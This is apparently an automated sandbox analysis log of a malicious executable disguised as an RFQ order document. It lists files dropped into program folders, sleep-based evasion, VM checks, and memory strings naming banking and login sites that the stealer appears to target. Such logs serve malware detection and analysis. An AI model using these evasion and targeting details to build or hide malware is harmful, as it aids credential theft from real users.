Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe			Jump to dropped file
Source: C:\Windows\System32\alg.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe			Jump to dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

API coverage: 4.7 %

Source: C:\Windows\System32\alg.exe TID: 4008	Thread sleep time: -270000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\alg.exe TID: 2764	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe TID: 1632	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2028	Thread sleep time: -7378697629483816s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7176	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 5024	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 4916	Thread sleep count: 2359 > 30
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 4916	Thread sleep count: 7442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe TID: 8096	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 7679 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2068	Thread sleep count: 2000 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7844	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3144	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\alg.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,		0_2_0046445A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,		0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,		0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,		0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,		0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,		0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,		0_2_004637EF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,		0_2_00463B12
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,		0_2_0046BCBC

Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\System32\alg.exe	Thread delayed: delay time: 60000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe			Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe			Jump to behavior

Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1248289335.00000000004CB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1248581462.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1312296680.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1292422289.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1250129106.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: XClient.exe, 00000007.00000002.2513650062.000000001BD70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3u
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWK/Q7
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: wscript.exe, 00000012.00000002.1361335987.000001EA9B656000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P(W
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHE
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: build.exe, 00000006.00000002.1709366618.0000000000E8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: build.exe, 00000006.00000002.1724819529.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002C70000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002E98000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 